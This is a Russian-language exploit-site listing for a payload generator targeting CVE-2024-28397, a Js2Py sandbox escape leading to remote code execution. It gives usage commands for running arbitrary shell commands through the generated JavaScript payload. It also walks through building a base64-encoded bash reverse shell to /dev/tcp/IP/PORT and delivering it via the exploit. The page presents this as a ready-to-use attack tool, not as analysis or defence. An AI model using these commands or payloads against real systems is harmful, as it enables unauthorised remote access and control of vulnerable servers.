## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-Y0NALDEZ-CVE-2024-28397-JS2PY-RCE
# CVE-2024-28397 - Генератор полезной нагрузки для обхода песочницы Js2Py
Этот скрипт генерирует JavaScript-нагрузку, которая может быть выполнена с помощью Js2Py в уязвимых средах, где внутренние компоненты Python доступны через обёртки объектов.
## Использование
Базовая команда выполнения:
root@kitploit:~
python3 cve-2024-28397.py -c "id"
Генерация компактной однострочной нагрузки:
root@kitploit:~
python3 cve-2024-28397.py -c "whoami" --compact
## Обратный шелл с использованием Base64
Сгенерируйте Base64-нагрузку:
root@kitploit:~
echo 'bash -i >& /dev/tcp/IP/PORT 0>&1' | base64 -w0
Сгенерируйте полезную нагрузку для Js2Py:
root@kitploit:~
python3 cve-2024-28397.py -c "bash -c 'echo BASE64_OUTPUT | base64 -d | bash'" --compact